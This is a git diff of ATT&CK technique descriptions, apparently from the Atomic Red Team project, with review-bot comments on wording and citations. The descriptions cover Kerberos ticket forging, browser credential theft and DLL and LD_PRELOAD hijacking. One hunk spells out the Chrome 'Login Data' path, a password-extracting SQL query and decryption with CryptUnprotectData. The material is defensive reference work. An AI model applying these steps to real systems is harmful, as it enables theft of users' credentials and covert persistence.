A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket) -[Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks) +A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks) -[Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)
+A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014) + +Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)
## Atomic Tests diff --git a/atomics/T1552.001/T1552.001.md b/atomics/T1552.001/T1552.001.md index 1bd6f261..300e9199 100644 --- a/atomics/T1552.001/T1552.001.md +++ b/atomics/T1552.001/T1552.001.md @@ -4,7 +4,7 @@ It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP) -In cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)
+In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)
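Review bot: `cloud and/or containerized environments` in the `+` line reads awkwardly; `cloud or containerized environments` carries the same meaning. The substantive addition, credentials turning up `as parameters to deployment commands in container logs`, is the useful part of this change and is sourced (Unit 42 Unsecured Docker Daemons); the dropped space before `(Citation: Specter Ops - Cloud Credential Storage)` is consistent with the citation spacing used in the other `+` lines of this patch.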
## Atomic Tests diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md index 9f654a47..c246dec0 100644 --- a/atomics/T1555.003/T1555.003.md +++ b/atomics/T1555.003/T1555.003.md @@ -2,9 +2,9 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1555/003)
Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers. -For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData ‎April 2018) +For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018) -Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. 
(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) +Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004). Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016) diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md index a3822ffc..349306a5 100644 --- a/atomics/T1566.001/T1566.001.md +++ b/atomics/T1566.001/T1566.001.md @@ -1,8 +1,8 @@ # T1566.001 - Spearphishing Attachment ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1566/001) -
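Review bot: the `-` line's citation key `Microsoft CryptUnprotectData ‎April 2018` contains an invisible directional mark before `April`, which the `+` line removes; confirm the regenerated index and any rendered reference list use the same cleaned key, or the cross-reference will silently stop resolving. Joining `etc.` with the two citations that were split onto a separate line is correct, since the dangling line rendered as its own paragraph. One nit the hunk leaves untouched: the SQL `SELECT action_url, username_value, password_value FROM logins;` and the `AppData\Local\Google\Chrome\User Data\Default\Login Data` path are inline without code formatting, so the backslashes are at the mercy of the markdown renderer.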
Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. +
Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. -There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.
+There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.
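Review bot: the second paragraph appears as a `-`/`+` pair with no visible text difference, so the change must be trailing whitespace or line endings; that hides the one real edit in this hunk, the added sentence `Spearphishing may also involve social engineering techniques, such as posing as a trusted source.` Worth having the generator normalize trailing whitespace so future diffs show only content changes.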
## Atomic Tests diff --git a/atomics/T1574.001/T1574.001.md b/atomics/T1574.001/T1574.001.md index 76e19e49..beaef109 100644 --- a/atomics/T1574.001/T1574.001.md +++ b/atomics/T1574.001/T1574.001.md @@ -1,13 +1,12 @@ # T1574.001 - DLL Search Order Hijacking ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1574/001) -
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. +
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. -There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) +There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. 
Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) -Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking) +Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking) -If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. -Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
+If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
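Review bot: the new redirection sentence, `which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL`, is grammatically tangled and drops the concrete mechanism the `-` line named (a `.manifest` or `.local` redirection file) while keeping the Microsoft Dynamic-Link Library Redirection and Microsoft Manifests citations that describe exactly that. Suggest: `which, once enabled in the Registry and paired with a .local or .manifest redirection file, causes a program to load a different DLL`. The final `+` line also merges the privilege-escalation paragraph and the "appear to behave normally" paragraph into one; harmless if intentional upstream, but it changes rendered structure without changing content.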
## Atomic Tests diff --git a/atomics/T1574.002/T1574.002.md b/atomics/T1574.002/T1574.002.md index cfe6cca2..a5c25e44 100644 --- a/atomics/T1574.002/T1574.002.md +++ b/atomics/T1574.002/T1574.002.md @@ -1,10 +1,8 @@ # T1574.002 - DLL Side-Loading ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1574/002) -
Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program. +
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s). -Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: About Side by Side Assemblies) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable by replacing the legitimate DLL with a malicious one. (Citation: FireEye DLL Side-Loading) - -Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.
+Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)
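Review bot: `planting then invoking a legitimate application that executes their payload(s)` in the first `+` line is hard to parse; `planting a legitimate application next to the payload and then invoking it` states what the second `+` line elaborates (application and payload positioned alongside each other). The rewrite also removes the WinSxS manifest explanation and the `About Side by Side Assemblies` citation, so if a reference list in this file still carries that entry it is now orphaned and should be regenerated without it.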
## Atomic Tests diff --git a/atomics/T1574.006/T1574.006.md b/atomics/T1574.006/T1574.006.md index a3370e4d..8d8a9ab8 100644 --- a/atomics/T1574.006/T1574.006.md +++ b/atomics/T1574.006/T1574.006.md @@ -1,10 +1,12 @@ -# T1574.006 - LD_PRELOAD +# T1574.006 - Dynamic Linker Hijacking ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1574/006) -
Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) +
Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD) -Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997) +On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the export command, setenv function, or putenv function. 
Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s os.environ. -LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
+On Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD are loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) + +On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the DYLD_INSERT_LIBRARIES environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass)
## Atomic Tests
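Review bot: wording problems in the added lines of the T1574.006 hunk: `such Python's os.environ` is missing `as`; `how the macOS dynamic libraries (dyld) is implemented` should be `how the macOS dynamic loader (dyld) is implemented`; and `Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell` links the technique to itself, which reads like a wrong technique ID in the upstream text. The retained claim `loaded and mapped into memory by dlopen() and mmap() respectively` is also imprecise: objects named in LD_PRELOAD or /etc/ld.so.preload are mapped by the dynamic linker itself during program startup, before main() runs, whereas dlopen() is the runtime API for loading additional objects. Citation spacing is inconsistent in that line (`(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)` keeps a space the rest of the hunk removes). Finally, the H1 rename from `LD_PRELOAD` to `Dynamic Linker Hijacking` keeps the T1574.006 path, so the index and navigator layer files need the new display name as well.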